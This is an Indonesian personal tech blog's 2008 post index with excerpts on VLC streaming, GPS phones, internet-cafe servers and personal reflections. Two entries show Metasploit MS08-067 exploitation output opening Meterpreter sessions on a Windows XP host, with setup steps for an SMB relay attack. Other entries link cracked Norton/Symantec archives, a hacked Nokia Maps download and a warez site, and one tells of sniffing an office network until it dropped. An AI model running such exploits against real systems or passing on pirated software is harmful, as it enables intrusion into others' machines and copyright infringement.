Posts

Showing posts from 2008

pakai lighttpd buat webserver ? tergantung ...

Security, speed, compliance, and flexibility -- all of these describe lighttpd (pron. lighty) which is rapidly redefining efficiency of a webserver; as it is designed and optimized for high performance environments. With a small memory footprint compared to other web-servers, effective management of the cpu-load, and advanced feature set (FastCGI, SCGI, Auth, Output-Compression, URL-Rewriting and many more) lighttpd is the perfect solution for every server that is suffering load problems. And best of all it's Open Source licensed under the revised BSD license.

memang httpd webserver , browser memang kata yang familiar di internet jagad maya ini , tapi ketangguhan webserver itu bisa diuji juga lho ..

pernah pakai lighttpd ? saya pernah , disinyalir disitus http://www.lighttpd.net/ fly light , sekuriti , kecepatan dll bisa didapatkan disini , saya pernah uji kompabilitas terhadap video streaming , hasilnya cukup cepat juga untuk diembed kan didalam sebuah page halaman , tapi semua t…

Anak Bus & Sekolah Maya

Ini duniaku mungkin sama dengan duniamu ..

Malam ini mataku sempat terbelak betapa tidak seorang bocah jalanan tertidur dibelakang sebuah bus patas , terlelap mungkin di mimpinya dia tidur diatas kasur yang empuk .. begitu bangun dia sadar diantara kekejaman dunia, aku bisa melihatnya disela pintu itu , tanya ku ini salah siapa ?

UUD 1945 pasal 34 ayat 1 mengamanatkan, fakir miskin dan anak terlantar
dipelihara oleh negara.

Sebenernya dunia pendidikan bisa dinikmati rakyat biasa bahkan menembus lapisan masyarakat miskin tidak jor jor hanya ucapan semata ...

Dunia informasi dan teknologi harusnya bisa mengangkat semua itu , pendidikan murah melalui media internet e-learning seharusnya mudah didapat kalau perlu disediakan gratis beserta komputer - komputer daripada cuma pom bensin , supermarket , sentral bisnis , dll yang hanya memperjauh GAP kaya dan miskin ..

Edukasi lebih bersifat ke teknologi saat ini masih belum tercapai sasaran tuh * ...

saya tidak habis pikir kok kemana ya semua it…

Lanjutan Exploit windows Universal

[*] Meterpreter session 11 closed.
msf exploit(ms08_067_netapi) > set RHOST 10.11.21.186
RHOST => 10.11.21.186
msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 12 opened (10.11.21.200:19393 -> 10.11.21.186:4444)

meterpreter > ps x

Process list
============

PID Name Path
--- ---- ----
256 msmsgs.exe C:\Program Files\Messenger\msmsgs.exe
492 i2050.exe C:\Program Files\Nortel\IP Softphone 2050\i2050.exe

Exploit Windows Universal dengan Tools Framework - Metasploit dan SMB Relay (hdm)

Ada apa dengan MS08-067 ? berikut penjelasannya …
Kali ini saya mencoba share kepada semua bagaimana saya menerapkan metode exploit SMB relay Client, mencoba mengakses SMB service , dimana attacker dapat menerobos Samba jika mereka menjalankan internet explorer atau outlook express.
Metode ini dipublish oleh Sir Dystic selama @tlantacon pada tahun 2001 dan di implementasikan pada metasploit juli 2007. hal ini yang membuat rasa penasaran saya bagaimana metode exploit itu dijalankan , berikut artikel yang saya buat.
Download metasploit framework terbaru atau bisa mengunjungi http://www.metasploit.com

root@boc [~/metasploit]# wget http://spool.metasploit.com/releases/framework-3.2.tar.gz
root@boc [~/metasploit]# tar -zxvf framework-3.2.tar.gz
root@boc [~/metasploit]# cd framework-3.2
mroot@boc [~/metasploit/framework-3.2]# ./msfconsole

# # ###### ##### ## #### ##### # #### # #####
## ## # # # # # # # # # # # #
# ## # ##### # # # #### …

Logika Antar Maya - InetStuff

Image
Nih stuff saya yang sering saya pakai istilah kata sih alat perang *

disini kasih tau aja deh mulai urutan dari 1 sampai 16

1. Laptop Zyrex centrino 1.6 , ram 512 , hardisk 40 GB , OS nya backtrack 3 dan windows xp , nih sering dipake buat oprek oprek internet menjelajah dunia maya .

2. Simbada speaker duh lupa nih versi berapa , suaranya cukup lumayan ampuh buat ganggu tetangga sebelah rumah.

3. Hardisk external hitachi 320 GB buat taruh mulai dari data , software sampai film2x yang bagus, biasanya sih sourcenya dari www.warez-bb.org .

4. HP nexian dual GSM + CDMA nih hp sering dipake buat nelpon2x tapi sayang batere nya cepet abis 2 hari langsung go to go

5. Kacamata + Dompet , mata emang minus setengah sih , dompet buat simpen uang , transaksi , bayar charge internet dll

6. Laptop fujitsu , pentium 4 - 768 Ramnya OS windows xp , hardisk 60 GB sering dibawa bawa ke kantor ( pinjeman sih :D ).

7. Tas laptop merk HP dulu beli di www.jakartanotebook.com nih tas udah setahun awet juga.

8. Kab…

Hitam benar-benar hitam

* bitchchecker (~java@euirc-a97f9137.dip.t-dialin.net) Quit (Ping timeout#)
* bitchchecker (~java@euirc-61a2169c.dip.t-dialin.net) has joined #stopHipHop
--bitchchecker-- kok gw dikick
--bitchchecker-- apa ngga bisa diomongin baik2
--bitchchecker-- jawab!
--Elch-- ngga ada yg kick lu kok
--Elch-- lu tadi ping timeout: * bitchchecker (~java@euirc-a97f9137.dip.t-dialin.net) Quit (Ping timeout#)
--bitchchecker-- ping apaan men
--bitchchecker-- timing di kompi gw bener
--bitchchecker-- gw malah punya DST
--bitchchecker-- lo pasti ban gw kan
--bitchchecker-- ngaku aja lo jink
--HopperHunter|afk-- LOL
--HopperHunter|afk-- buset goblok banget lu, DST^^
--bitchchecker-- KITA PUNYA DST!
--bitchchecker-- udah dari dua minggu lalu
--bitchchecker-- klo lo nyalain kompi pasti ada pesan dari windows: DST is applied.
--Elch-- Wah lu bener2 pakar komputer ya
--bitchchecker-- diem! gw hack lo
--Elch-- ok, gua diem, semoga lu nggak nunjukin ke kita seberapa hebat lu ngehack ^^
--bitchchecker-- kasih gw nomer network lu, m…

Kesasar ? ....

Sore ini saya disibukkan dengan survei lokasi , yah maklum lokasi buat usaha sih cuma nih lokasi kok diperumahan ya , wah jangan perumahan kalau bisa sih , maunya sih pas depan nya ada jalan rayanya karena kan lokasi usaha sangat menentukan , yah walhasil lumayan juga lokasi ini dibilangan jati asih .. bekasi , pekayon , jalan dengan adik saya brrrrrrrrrrrrmmmmmmm naik jupiter dipandu juga ke lokasi oleh temannya adikku kebetulan dia juga ada niat pengen usaha juga ( warnet ) semoga berhasil ...

wah niatan jadi urung karena lokasi di perumahan takutnya kalau buka game centre banyak ibu2x yang komplain , belum lagi ada masalah dengan warga setempat, yah akhirnya aku jelasin kendala-kendala buka warnet di perumahan.

hmmm langit terlihat mendung setelah lokasi survei aku analisa akhirnya aku niatkan untuk pulang waktu di hp nokia n82 menujukkan pukul 5.15 sore.

aku segera angkat hp ku mencari ruang gerak bebas dijalan , menyalakan garmin symbian mobile , setelah 2 men…

All I want

You can't ignore or hide away
Can't escape from the things that line our way
Take it, leave it, or break it
Anyway, you can't get back to yesterday

All I want, all I want to do
You better listen from now on
Stop what's going on, stop what's going wrong
You better listen from now on

Confidence, coincidence, call it a sin
It's just like people say
Tomorrow's here so open up you're eyes
Never hesitate

It makes me want to give you everything
Pick you up and take you home again
Hold you tight and think that now is then
All I want to do

All I want to do
Is make you listen from now on
Cardboard men are strong, but paper can be torn
Oh, you better listen from now on

Nokia Maps v2.0.3204 S60v3

Since nokia upgrade firmware to v 30.0.019 i cant hack it , i'm not sure how to hack the sys the root c:\sys\bin , try reinstall x-plore still cant read and explore the folder , almost everyday i think it , very confused , hmmmff maybe someday can hack it , i give this link if you have firmware below < v 30.0.019 try it

download : http://www.anonym.to/?http://www.mediafire.com/?4ru9vcxdgdx

hope nokia maps hack it again LOL , without payment and free navigation for all

regards
iqbal

rute GPS

Pagi ini , GPs di tangan ( n82 ) including garmin xt symbian mobile , nyalakan wuih ..
keyword cari kebon sirih keluar menara multimedia dll , pilih deh , on kan nih gps ,
pasang headset + volume suara 100 % , wusssssssss jalan , navigasi seperti ini cukup membantu dengan adanya voice + gambar kordinat kita berjalan , cek pulsa tidak abis kan ini pakai GPS langsung , asyiknya sampai tujuan say kasih kordinat lagi supaya nanti routing pulang lebih menantang , cari jalan tikus hehehehe

Kebangetan !!!

Waduh baru denger nih gedung katanya di flood sama orang lain , tapi kenapa tidak di block ip nya atau di tracert ip nya berapa ? , segmen berapa , lock macadress nya ,
kalau mac address bisa diganti , tetapi kalo yang di flood ini ketauan segmennya ya sebaiknya di cari kalo perlu di blok tuh satu lantai , kata si empu nih network kejadiannya dari jam 10 kmarin , gila gak !!! ah dasar nubie sukanya flood doank disuruh benerin pasti gak bisa

Gila GPS ............

Sabtu kmarin niat beli hp yang pakai gps , uhh dengan ditemani kakakku yang kebetulan kenal salah satu distributor hp nokia akhirnya beli juga nih hp , lengkap dengan gps
, bawa pulang nih hp rencana mau oprek seharian apa-apa aja yang bisa dipakai digunakan , ternyata fiturnya bagus juga , lengkap wifi nih spesifikasi detailnya

perating Frequency

* WCDMA2100 (HSDPA), EGSM900, GSM850/1800/1900 MHz (EGPRS)
* Automatic switching between bands and modes

Dimensions

* Volume: 90 cc
* Weight: 114 g
* Length (max): 112 mm
* Width (max): 50.2 mm
* Thickness (max): 17.3 mm

Memory Functions

* Up to 100MB internal dynamic memory* for messages, ringing tones, images, video clips, calendar notes, to-do list and applications
* Hot swappable microSD memory card slot

Power Management

* Battery: Nokia Battery (BP-6MT) 1050mAh
* Talk time: up to 190 min (WCDMA), up to 260 min (GSM)
* Stand-by time: up to 210 hours (WCDMA), up to 225 hours (GSM)
* Still images: up to 290 pictures (with flash)
* Video capture: up to 110 m…

Lucunya

Hari ini bener-bener ngantuk banget , still monitoring nih sampai kapan ya ... siang ini membawa ngantuk kearah ujicoba yaitu sniffing daripada ngantuk pikirku ..
, coba download switch sniffer ahh pikirku , jalankan tapi pas lagi ujicoba kok ada masalah dengan network disini ya , tujuanku padahal hanya sniffing , ehh gak tau nya network nya drop semua , lucunya "heboh" banget deh ... ada yang salah-salahan
ada yang lagi browsing kirim2x email sampe teriak teriak segala , ahh pikirku bisa jadi down kah , mungkin ini swicth sniffernya broadcast masalahnya , lucunya mereka "heboh" seperti anak kecil hihihihiihi laughing out loud ..

unduh zimbra

--14:40:31-- http://h.yimg.com/lo/downloads/5.0.10_GA/zcs-5.0.10_GA_2638.RHEL5.20081003052615.tgz
Resolving h.yimg.com... 8.12.217.124, 206.33.55.125, 206.33.49.126
Connecting to h.yimg.com|8.12.217.124|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 326344886 (311M) [binary/octet-stream]
Saving to: `zcs-5.0.10_GA_2638.RHEL5.20081003052615.tgz'

9% [=======> ] 32,630,103 728K/s eta 7m 26s

728 kbps wah ...........

sakit hati ....

emang sakit hati yang gw rasain , tapi disini bukan sakit hati karena putus cinta tapi sakit hati hardisk external 80 GB 2,5 inch gw , bablas ke lantai gara-gara abis nonton ketiduran trus ketendang tuh hardisk , bener deh sakit nya lebih sakit dari sakit hati ... lagi cari usaha target dpo sih ke harco mas mangga 2 , as long as i know there is place for recovery the disk , yah mungkin harus kesana , kalau tidak bisa di backup terpaksa nih harus di ikhlaskan , semoga dan berharap setelah itu tetap semangat ....

upgrade ios wifi router ke ddwrt

baca ini untuk wifi yang di support oleh ddwrt

http://www.dd-wrt.com/wiki/index.php/Supported_Devices


iseng upgrade ddwrt versi SP1

http://www.dd-wrt.com/dd-wrtv2/downloads/v24-sp1/Consumer/Linksys/WRT54GL_1.1/dd-wrt.v24_std_generic.bin

and done .... lumayan buat tuning ........ deh

Norton Corporate Edition

http://rapidshare.com/files/144041313/N.G.v14.0.3.28361sp3.part1.rar
http://rapidshare.com/files/144043323/N.G.v14.0.3.28361sp3.part2.rar
http://rapidshare.com/files/122332757/Symantec.AntiVirus.Corporate.Edition.v10.1.7000.7.Win64_abu137_.rar
http://rapidshare.com/files/122332468/Symantec.AntiVirus.Corporate.Edition.v10.1.7000.7.Win32_abu137_.rar
http://rapidshare.com/files/102576333/shiva.om__antivirus_corporate_edition.pdf
http://rapidshare.com/files/127782258/Symantec_Corporate_10_XP_Only_mahek_cw.rar

http://rapidshare.com/files/111060950/S.A.C.O.1021.MR1-ZWTiSO.part01.rar
http://rapidshare.com/files/111068773/S.A.C.O.1021.MR1-ZWTiSO.part02.rar
http://rapidshare.com/files/111085087/S.A.C.O.1021.MR1-ZWTiSO.part03.rar
http://rapidshare.com/files/111098145/S.A.C.O.1021.MR1-ZWTiSO.part04.rar
http://rapidshare.com/files/111109243/S.A.C.O.1021.MR1-ZWTiSO.part05.rar
http://rapidshare.com/files/111121465/S.A.C.O.1021.MR1-ZWTiSO.part06.rar
http://rapidshare.com/files/111121257/S.A.C.O.1021.MR1-ZWTiSO.…

DragonForce Band

yang mau unduh dragonforce band silahkan unduh di

http://rapidshare.com/users/OLN52A

free domain dari co.cc

lumayan redirect web co.cc daftar di http://www.co.cc

Domain : inetholic.co.cc
Service Type : URL Forwarding
Title : inetholic.blogspot.com
Target URL: http://inetholic.blogspot.com
Frame : URL Hiding
Site Description : inetholic.blogspot.com
Search Keywords : inetholic.blogspot.com
Google email : Not use.
Status :
Created on : 2008-09-29
Last updated on : 2008-09-29

http://www.inetholic.co.cc/

Kisah seorang network-er & system-er *

Mungkin disini saya telah mencurahkan pekerjaan saya , memantau sebuah traffik dulunya hingga berkutat di dunia system .. aku mencoba belajar tentang semua itu tak peduli apapun yang terjadi , mungkin aku bisa dikatakan pekerja keras tapi ini penilaianku yang mungkin aku jalani , bekerja senin - jumat , lalu sabtu atau minggu diriku bekerja sebagai sysadmin di warnet , lumayan untuk sebuah kehidupan yang aku jalani , tapi aku ingin bekerja di sebuah perusahaan dengan dengan posisi yang tetap hingga aku bisa mencurahkan semua tenaga dan pikiranku dan membuat aku lebih bermotivasi menghadapi berbagai macam pekerjaan yang ada , semoga suatu saat nanti aku bisa seperti itu ...

di dini hari 3.20 ...

Perbandingan Streaming Mudik

dibawah ini merupakan streaming mudik

1. http://124.81.82.136/ltmc2008/kamera/streaming-cctv.php

dan

2. http://plasa2.plasa.com

dari hasil 1. terlihat cukup jelas untuk streaming pertama cuma ini tidak memakai metode server , alias begitu di buka bisa memakan bandwidth dari streaming camera sendiri lama lama dijamin modar begitu banyak yang akses :D

dari hasil ke 2 gambar kurang jelas disini menggunakan metode transcode yang cukup memukau saya mengembangkan metode ini , tetapi cukup realible menggunakan server sendiri , load cpu menggunakan quad core < 35 persen

vlc auto restart

Siapa sangka dari program opensource yang dikembangkan telah menjadi sebuah streaming yang handal itulah vlc ... saya bersama tim saya telah berhasil mendevelop sebuah vlc yang cukup memukau di http://plasa2.plasa.com ....... disini saya membuat auto restart

crontab -l

59 * * * * sh /home/vlc/vlcmudik/config/start.sh

tiap 1 jam sekali akan mematikan semua koneksi dan melalukan nya kembali

isi dari vlc


killall vlc;
sleep 10;
sh /home/vlc/vlcmudik/config/cikampek2.sh;
sh /home/vlc/vlcmudik/config/gilimanuk2.sh;

sh /home/vlc/vlcmudik/config/merak2.sh;
sleep 1;
sh /home/vlc/vlcmudik/config/solobalapan.sh;
sh /home/vlc/vlcmudik/config/tasikmalaya1.sh;
sh /home/vlc/vlcmudik/config/banyumas1.sh;
sh /home/vlc/vlcmudik/config/gambir1.sh;
sleep 1;
sh /home/vlc/vlcmudik/config/jogja1.sh;
sh /home/vlc/vlcmudik/config/lowsarang.sh;
sh /home/vlc/vlcmudik/config/merak3.sh;
sh /home/vlc/vlcmudik/config/tawang1.sh;
sleep 1;
sh /home/vlc/vlcmudik/config/bakahuni1.sh;
sh /home/vlc/vlcmudik/config/banyumas2.sh;
sh /home/vlc/…

Teman yang terlupakan ...

ketika angin berpaling dari putaran bumi ...
hanya air hujan dan dingin yang jatuh ke bumi ...
ketika salam disampaikan ...
hanya curahan hati yang terucap ...
sesaat terjenak , terpaku menatap keheningan ...
hanya wajah dirimu & diriku terlihat di senja ...
berjalan menepis harapan ...
berlari menuai angan ...

aku bukan sang armor puitis ...
tapi aku hanya manusia biasa ...
aku hanya sepenggal bagian isi bumi ...
sampai aku hilang bahkan tenggelam ...

hanya ketulusan terlahir dan ketiadaan ...
hanya cinta terlahir dari kebahagiaan ..
dan hanya sahabat yang tak pernah kulupakan ...

copyright 2008 iqbal aka inetholic ///

Create Dota Di Linux - Centos 4

#!/bin/sh
#
### Flush all rules ###
/sbin/iptables -F
/sbin/iptables -t nat -F
/sbin/iptables -t mangle -F

### Erase all non-default chains ###
/sbin/iptables -X
/sbin/iptables -t nat -X
/sbin/iptables -t mangle -X

### DOTA ###
/sbin/iptables -t nat -A PREROUTING -p tcp -d 203.84.156.114 --dport 6101 -j DNAT --to 192.168.99.1:6101
/sbin/iptables -t nat -A PREROUTING -p tcp -d 203.84.156.114 --dport 6102 -j DNAT --to 192.168.99.2:6102
/sbin/iptables -t nat -A PREROUTING -p tcp -d 203.84.156.114 --dport 6103 -j DNAT --to 192.168.99.3:6103
/sbin/iptables -t nat -A PREROUTING -p tcp -d 203.84.156.114 --dport 6104 -j DNAT --to 192.168.99.4:6104
/sbin/iptables -t nat -A PREROUTING -p tcp -d 203.84.156.114 --dport 6105 -j DNAT --to 192.168.99.5:6105
/sbin/iptables -t nat -A PREROUTING -p tcp -d 203.84.156.114 --dport 6106 -j DNAT --to 192.168.99.6:6106
/sbin/iptables -t nat -A PREROUTING -p tcp -d 203.84.156.114 --dport 6107 -j DNAT --to 192.168.99.7:6107
/sbin/iptables -t nat -A PREROUTING -p tcp -d 203.84.1…

transcode vlc 0.9.2

Image
Implementasi selesai pastikan untuk configure vlc =

./configure --enable-x11 --enable-xvideo --enable-gtk --enable-sdl --enable-ffmpeg --enable-faad --enable-mad --enable-libdvbpsi --enable-a52 --enable-dca --enable-libmpeg2 --enable-dvdnav --enable-vorbis --enable-ogg --enable-flv --enable-theora --enable-faac --enable-mkv --enable-freetype --enable-fribidi --enable-speex --enable-flac --disable-livedotcom --enable-caca --disable-skins --enable-skins2 --enable-alsa --enable-kde --enable-qt --enable-wxwindows --enable-ncurses --enable-release --enable-dvbpsi --enable-rtsp --enable-realrtsp --enable-live555 --with-live555-tree=/data/live/ --enable-http ; make ; make install

librarynya butuh banyak ... jadi sabar mencarinya

/data/live = live555 tempat direktori dimana ffmpeg diinstall

ffmpeg

svn checkout svn://svn.mplayerhq.hu/ffmpeg/trunk ffmpeg
cd ffmpeg
./configure --enable-libmp3lame --enable-libogg --enable-libvorbis --disable-mmx --enable-shared

ngantuk ahh dah smalem suntuk compile n…

Holyshit attacker .... dasar nubie ... defence

Kmarin minggu dapat kerjaan nih untuk nstall server kebetulan buat warnet game , yah akhirnya install deh , OS tujuan gw ... yaitu mikrotik dan clarkconnect , saya prefer ke mikrotik cuma sayangnya yang bajakan gak support sata ya udah akhirnya pakai clarkconnect, awalnya sih ragu tapi akhirnya saya tetap memilih clarkconnect

Community Edition 4.3 ISO HTTP FTP 513 MB

download file itu

saya install mudah banget , mungkin networker bisa pakai ini untuk bagi bandiwidth , support vpn , squid sampai snort segala ada disini

saat ujicoba dengan snort ke trap banyak banget yang mencoba membobol ..

lihat /var/log/messages

Sep 1 11:32:08 positive9 sshd(pam_unix)[12532]: check pass; user unknown
Sep 1 11:32:08 positive9 sshd(pam_unix)[12532]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=211.152.42.145
Sep 1 11:32:12 positive9 sshd(pam_unix)[12534]: check pass; user unknown
Sep 1 11:32:12 positive9 sshd(pam_unix)[12534]: authentication failure; logname= uid=0 euid=0 tty…

Install Red5

Red5 streaming server merupakan sebuah aplikasi streaming server yang berbasis java. disini saya akan mengimplementasikan pada redhat enterprise 5 atau bisa juga dengan centos dan mudah-mudahan berguna untuk kita semua.

Yum Install JDK atau bisa di download dari http://java.sun.com/javase/downloads/index.jsp dalam bentuk
rpm bin

root@inetholic:/data/red5# inetholic red5 # yum install jdk
Loaded plugins: installonlyn, priorities

epel 100% |=========================| 2.1 kB 00:00

logos 100% |=========================| 951 B 00:00

dag 100% |=========================| 951 B 00:00

base 100% |=========================| 1.1 kB 00:00

updates 100% |=========================| 1.1 kB 00:00

primary.xml.gz 100% |=========================| 895 kB 00:00

Unpacking JAR files...
rt.jar...
jsse.jar...
charsets.jar...
tools.jar...
localedata.jar...

Install…

Renungan ...

Anda sadar menghabiskan waktu luang anda didepan komputer , menjelajah dunia maya ini hingga detail detail informasi bisa anda peroleh, paruh waktu anda sebagian dihabiskan didepan internet, sebagai contoh anda bekerja jam 8 pagi sampai jam 5 sore, kira kira 8 jam dikurang waktu ibadah, makan siang tapi ... apakah ini murni ? sementara otak kita masih tertinggal di depan meja komputer ... pikiran tertingal ,

Belum waktu yang anda habiskan dirumah jika terdapat kejadian yang urgent dan perusahaan anda membutuhkan anda secepat mungkin menangani suatu masalah yang anda hadapi, berkordinasi dengan rekan tim kerja anda hingga bisa menyita waktu anda, tapi inilah yang terjadi pada anda , atau malah anda yang lebih gila menghabiskan waktu didepan internet dibandingkan saya.

Internet saat ini mudah didapat hingga anda sadar bahwa anda adalah seorang yang inetholic .... tapi inilah yang benar-benar terjadi semua serba cepat, berlalu dan berlalu ... hingga anda menjadi seseorang…

Pindah Url nih ....

Saya tidak mau mengatasnamakan diri saya sendiri melainkan atas nama semua inetholic di dedemit maya ini ... karena itu pindah url sebelumnya.

http://iqbalmaulana.blogspot.com ...

Selamat Berinet ria dan semoga menjadi inetholic ....